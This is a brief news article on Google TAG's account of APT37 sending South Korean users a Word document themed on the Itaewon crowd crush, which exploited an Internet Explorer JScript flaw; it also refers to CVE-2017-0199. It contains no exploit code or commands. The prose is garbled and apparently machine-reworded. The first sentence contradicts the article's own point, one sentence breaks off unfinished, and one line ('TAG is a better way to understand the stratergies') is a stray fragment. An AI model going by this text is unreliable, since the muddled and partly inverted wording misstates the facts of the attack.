There are still a few things that Internet Explorer cannot do that Microsoft’s Edge browser can. Unfortunately, a North Korean-backed organization allegedly exploited one of them this autumn, located deep inside Microsoft Word. According to Google’s Threat Analysis Group (TAG), the government-backed APT37 has previously taken advantage of Internet Explorer’s lingering presence.
APT37 has targeted South Korean journalists, activists, and North Korean defectors with resounding success using a limited but nonetheless practical Internet Explorer approach.
Visitors to Daily NK, a South Korean website devoted to North Korean news, were the focus of the most recent operation. This one involves the Itaewon Halloween crowd crush, which resulted in at least 151 fatalities. A Microsoft Word.docx document with the subject line “accident reaction issue” began to go around. It appeared to be timed and dated less than two days after the occurrence.
Users in South Korea started uploading the document to the Google-owned VirusTotal. It was marked with the long-known Word and WordPad vulnerability, CVE-2017-0199.
Similar to April 2017, if you choose to read the document in Word/WordPad outside of the “Protected View.”
TAG is a better way to understand the stratergies
The paper will download HTML that resembles Rich Text Format templates and a rich text template from an attacker-controlled site. In what Microsoft refers to as “specially crafted files,” Office and WordPad inherently use Internet Explorer. It displays HTML, providing an entry point for attackers to upload different malware payloads. The vulnerability was fixed that same month, but it continued to exist; more than a year later, a Petya wave used it as one of its vectors.
The JavaScript engine in Internet Explorer is the source of the specific vulnerability. Memory writing and data type confusion result from a mistake. Those mistakes were made during just-in-time optimization. Additionally, this particular vulnerability cleaned up by erasing its existence from the Internet Explorer cache and history. Google’s TAG is unaware of the payloads that were sent.
But APT37 has previously spread vulnerabilities that activated BLUELIGHT, ROKRAT, and DOLPHIN, all of which centered on the political and economic objectives of North Korea.
Even though Microsoft fixed the exact weakness in its JScript engine, remote-code Word doc assaults appear to be here to stay, given that this is their sixth year. And performers in North Korea will be delighted to portray them.
TAG is dedicated to disseminating research to educate the security community about bad actors like APT37. Additionally, to increase safeguards throughout the ecosystem, TAG better understands the strategies and methods used by these kinds of actors.